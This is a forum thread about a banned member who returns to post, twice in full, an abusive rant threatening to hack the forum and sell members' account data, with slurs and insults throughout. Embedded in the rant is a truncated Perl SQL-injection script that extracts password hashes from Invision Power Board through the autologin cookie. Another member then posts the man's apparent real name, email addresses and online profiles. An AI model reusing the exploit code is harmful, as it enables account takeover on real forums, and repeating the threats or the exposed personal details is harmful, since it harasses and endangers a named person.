Member kimchii warning

Status
Not open for further replies.
Is this comment the reason why Chewy was banned? If so, wth does this comment mean?

Chewy was also Kimchii. The comments he made were referencing the server software that runs the forum, and his perceived weaknesses of it; iow a veiled threat to hack.

Chewy was also Kimchii. The comments he made were referencing the server software that runs the forum, and his perceived weaknesses of it; iow a veiled threat to hack.

Wow. That's jacked up.

You know, life is too friggin short for that type of behavior. We're really only here for a cup of coffee man, why complicate it with BS. It takes all kinds I guess.

A tremendous amount of effort on the part of this member to accomplish what exactly?
Hi. I'm angry. Please listen to me complain. What? I have to leave? Okay I'll change shirts and come back.

Kind of self serving.

Anyway,
buh bye KimChew......

A lot of effort indeed - chewbacca joined in April 2013.
On the good side, this thread has inspired me to have Korean for lunch. Might have to give the new place down the road a go...I wonder if they do good kimchi...

199.231.142.3 Kentucky, Louisville, United States, 40269 I would of crashed this site yesterday if i wasnt watching a knife for sale. yes i am kimchii, and chewbaccaa, low level hacker someone said lol. just a heads up to all you tough guy cock suckers on here, you are the reason all paid account information will be sold to hungry European hacker friends of mine along with all the dog shit personal info to match. so i hope your all on high fraud alert ;) yes i already have all the info, and good luck in the future with my embedded $ua = new LWP::UserAgent;
$ua->agent("Mosiac 1.0" . $ua->agent);

if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}

my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $dbug = $ARGV[4]; # debug?

if (!$ARGV[2])
{
print "..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].\n\n";
exit;
}

my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b"," c","d","e","f");

my $outputs = '';

for( $i=1; $i < 33; $i++ )
{
for( $j=0; $j < 16; $j++ )
{
my $current = $charset[$j];
my $sql = ( $iver < 2 ) ? "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d% 2527$current%2527)/*" :
"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$ i,1)%3d%2527$current%2527)/*";
my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
my $res = $ua->get($path, @cookie);

is there anyone who is even capable in finding this? im going to go ahead and say no lol

now i know this will turn into one hell of a discussion, why is he doing this? is he really that big of a loser he has to ruin this site and its reputation? i'll allow all u fucking nazi forum fags to break that down.

to the admin bitch that started this thread, i have prem cookies on your pc, you can thank google for allowing me to backend end mirror your entire pc.

same with u bitches making smart ass comments. you can count on my downtime consisting of pulling all the data from all your personal pcs. i also found access to a few work machines in alberta canada 10.551.220.20 and Kentucky business servers.. i would list the ip's but theres like 20 ;)

well, one post ban on this account :p... then i'll move to an exchange ip... bounce around for a while as i fish out all the admins account info.

might be a while until bladeforums.com server error 500 shows up :D but when it does im sure you all will remember this thread. lol funny thing is i use to hack for fun, now i made a career out of it, but now its time to have a little fun again.

so please continue with all your bitch ass remarks about how funny it is 1 thread 2 bans :D:D:D:D:D:D:D:D:D:D:D you people must feel so good about yourselves for policing an internet forum LOL its just a shame this place had to fall because everyone in this thread thinks so highly of themselves. I know i do but hey .... im one of 5 people in the hacking world thats proficient in creating ruby injected python commands that are untraceable.

this is an incredibly slow morning for me, and in this time alone ive successfully pinged everyone who has commented in this thread. that means i know have your home address, and basic personal info. :eek: some people might be getting a little nervous reading this, as you should be. there are alot of good people will will experience some pretty damaging this all because of one honest mistake leading to alot of bullshit onions that should of been kept to themselves... but oh well ;)

so back to the shadows i go... did you people know that his site is worth almost 440k$ in value based on the traffic alone? this will be the 4th most valuable site i destroy :( thats such a waste .... but ive had a 25k$ offer for a little over 990k account info i already have pulled... it was a long night last night ... lets all just take a minute to appreciate the fuel of redbull and beef jerky LOLOLOL!!!!!!

how could someone like me even do this? well for future reference when ur site makes over 400$ a day, using the cheapest most cookie cutter html script java script and CSS combinations ... thats like having the queen of england over for dinner and providing your own security team that consists of a hamster and a sign that says please keep out. just so all you tech illiterate dumb fucks out there understand what i just said, this site makes over 400$ a day, and they have literally ZERO security in place to protect you from even the most experienced hackers :( that to me is the ultimate fuck you to all the customers on here. if your reading this and have a paid account i would be offended.

reason #1 i would never drop a dime on this shit site... there u go.

well i guess its time to fuck shit up, good day to u all, and thank you so much for inspiring me to relive some great memories terrorizing the internet.

you are all safe in betting i am having the first ... and last laugh here ...

LOL <3 -kimchi

p.s i encourage you all to have some kimchi and beer for lunch, i will be in korea first week in october having some, giving a cheers to you all.

199.231.142.3 Kentucky, Louisville, United States, 40269 I would of crashed this site yesterday if i wasnt watching a knife for sale. yes i am kimchii, and chewbaccaa, low level hacker someone said lol. just a heads up to all you tough guy cock suckers on here, you are the reason all paid account information will be sold to hungry European hacker friends of mine along with all the dog shit personal info to match. so i hope your all on high fraud alert ;) yes i already have all the info, and good luck in the future with my embedded $ua = new LWP::UserAgent;
$ua->agent("Mosiac 1.0" . $ua->agent);

if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}

my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $dbug = $ARGV[4]; # debug?

if (!$ARGV[2])
{
print "..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].\n\n";
exit;
}

my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b"," c","d","e","f");

my $outputs = '';

for( $i=1; $i < 33; $i++ )
{
for( $j=0; $j < 16; $j++ )
{
my $current = $charset[$j];
my $sql = ( $iver < 2 ) ? "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d% 2527$current%2527)/*" :
"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$ i,1)%3d%2527$current%2527)/*";
my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
my $res = $ua->get($path, @cookie);

is there anyone who is even capable in finding this? im going to go ahead and say no lol

now i know this will turn into one hell of a discussion, why is he doing this? is he really that big of a loser he has to ruin this site and its reputation? i'll allow all u fucking nazi forum fags to break that down.

to the admin bitch that started this thread, i have prem cookies on your pc, you can thank google for allowing me to backend end mirror your entire pc.

same with u bitches making smart ass comments. you can count on my downtime consisting of pulling all the data from all your personal pcs. i also found access to a few work machines in alberta canada 10.551.220.20 and Kentucky business servers.. i would list the ip's but theres like 20 ;)

well, one post ban on this account :p... then i'll move to an exchange ip... bounce around for a while as i fish out all the admins account info.

might be a while until bladeforums.com server error 500 shows up :D but when it does im sure you all will remember this thread. lol funny thing is i use to hack for fun, now i made a career out of it, but now its time to have a little fun again.

so please continue with all your bitch ass remarks about how funny it is 1 thread 2 bans :D:D:D:D:D:D:D:D:D:D:D you people must feel so good about yourselves for policing an internet forum LOL its just a shame this place had to fall because everyone in this thread thinks so highly of themselves. I know i do but hey .... im one of 5 people in the hacking world thats proficient in creating ruby injected python commands that are untraceable.

this is an incredibly slow morning for me, and in this time alone ive successfully pinged everyone who has commented in this thread. that means i know have your home address, and basic personal info. :eek: some people might be getting a little nervous reading this, as you should be. there are alot of good people will will experience some pretty damaging this all because of one honest mistake leading to alot of bullshit onions that should of been kept to themselves... but oh well ;)

so back to the shadows i go... did you people know that his site is worth almost 440k$ in value based on the traffic alone? this will be the 4th most valuable site i destroy :( thats such a waste .... but ive had a 25k$ offer for a little over 990k account info i already have pulled... it was a long night last night ... lets all just take a minute to appreciate the fuel of redbull and beef jerky LOLOLOL!!!!!!

how could someone like me even do this? well for future reference when ur site makes over 400$ a day, using the cheapest most cookie cutter html script java script and CSS combinations ... thats like having the queen of england over for dinner and providing your own security team that consists of a hamster and a sign that says please keep out. just so all you tech illiterate dumb fucks out there understand what i just said, this site makes over 400$ a day, and they have literally ZERO security in place to protect you from even the most experienced hackers :( that to me is the ultimate fuck you to all the customers on here. if your reading this and have a paid account i would be offended.

reason #1 i would never drop a dime on this shit site... there u go.

well i guess its time to fuck shit up, good day to u all, and thank you so much for inspiring me to relive some great memories terrorizing the internet.

you are all safe in betting i am having the first ... and last laugh here ...

LOL <3 -kimchi

p.s i encourage you all to have some kimchi and beer for lunch, i will be in korea first week in october having some, giving a cheers to you all.

You're an idiot.

Go ahead and slip "back to the shadows" Mr. Adams. Maybe we should pass along your threats to the Portland PD. They already have your info considering you filled a report with them in 2011 over a stolen bicycle.

Registration addresses for 2 of the accounts

robert.7.adams@gmail.com

volcomporsche@gmail.com

Robert Adams on Pinterest
www.pinterest.com/volcomporsche/
See what Robert Adams (volcomporsche) has discovered on Pinterest, the world's biggest collection of everybody's favorite things.

Robert Adams on Etsy
https://www.etsy.com/people/volcomporscheEtsy
View the Etsy profile for volcomporsche, who joined Etsy on February 07, 2012.

Following - Pandora Internet Radio - Listen to Free Music ...
http://www.pandora.com/profile/follo...porschePandora
watch now. Audio ads help pay our bills. For an entirely ad-free experience, you can upgrade. Activity · Stations · Likes · Following · Followers. volcomporsche ...

Gray/purple Subrosa Novus 2011 - BikePortland.org
bikeportland.org/2011/08/27/graypurple-subrosa-novus-2011-58216
Aug 27, 2011 - Neighborhood: &#8220;pearl district&#8221; Owner: Robert Adams OwnerEmail: Volcomporsche@gmail.com. Reward: 400. Description: Gray frame, forks, ...

So you are posting script kiddie exploits for invision power board software, which we don't use?

IDGI.

Small Penis Syndrome (SPS) must be a horrible affliction... especially when your fetid neither reeks of kimchi...

How do thee fail? Oh, let me count the ways... Those that know the least, know it the LOUDEST...

Last edited:
How do thee fail? Oh, let me count the ways... Those that know the least, know it the LOUDEST...
Indeed. If he was half as capable as he claims, his little rant would have been the forum login page, instead of a post in this thread.

Just another loud and angsty script kiddy who discovered how to spoof an IP, nothing to see here.

Bring It On KimDuChewKie !

Oops. Apologies. You are not here anymore.

But I must acknowledge the reciprocation. You have given at the very least as much entertainment as you claim to have received. And all for what, pray tell? To fling vieled threats at members of a specified toppic discussion forum. With all that awesome compuhackability why not cure alzhiemers or create an algorythm that slows clinical depression. Perhaps formulate a high yield low interest retirement account for disabled folks whose compensation expires upon mandatory retirement. Cure cancer, Son.
Then boy, the world would kneel before thee.
But this drivel, ah you're no huckleberry. No huckleberry ah tall. Just one of thousands of angry people lumbering through life with self perceived ability but no real devotion to anything. Just a another soul filling void killing time counting lost memories occupying a body standing among hundreds thousands millions of living breathing things making no difference to anything. Clap thy hands little one. Some very wonderful people here heard thy whimpering AND they acknowledged your prescence ah if only a wee instant of time. That is more than many receive and sadly, far more than your ilk deserves.
To have someones attention, such a special achievement. And what did you do with it? Its fleeting.
Hold on. Hold on..........

Ahhh, like you, its gone.

In before the move to the W&C dumbass thread, good timing GK!

In before the move to the W&C dumbass thread, good timing GK!

Some fine Mods here in this thread. Some friends of mine. Cant hardly believe any of them would find this malarky worthy of the high standards we try and uphold in the W&C dumbarse dept. This particular mule hasn't really pulled a load yet. Keeps getting stabled before the harnass can be strapped. :)
What a waste, huh? Even Kevin came down to take a peek. Ya know how hard it is to get folks to notice something and to just ......
Oh well, fodder is fodder, if only to be trampled into the barn floorboard cracks. Coulda been more but in the final act the ticket proved worth much less than the admission price.
I shall head back to the whine cellar where I belong now.

P.S. I vote 'Close'. The best way to answer a fool is silence.

Last edited:
Yeah this is p boring

What no death threats?

Status
Not open for further replies.
Back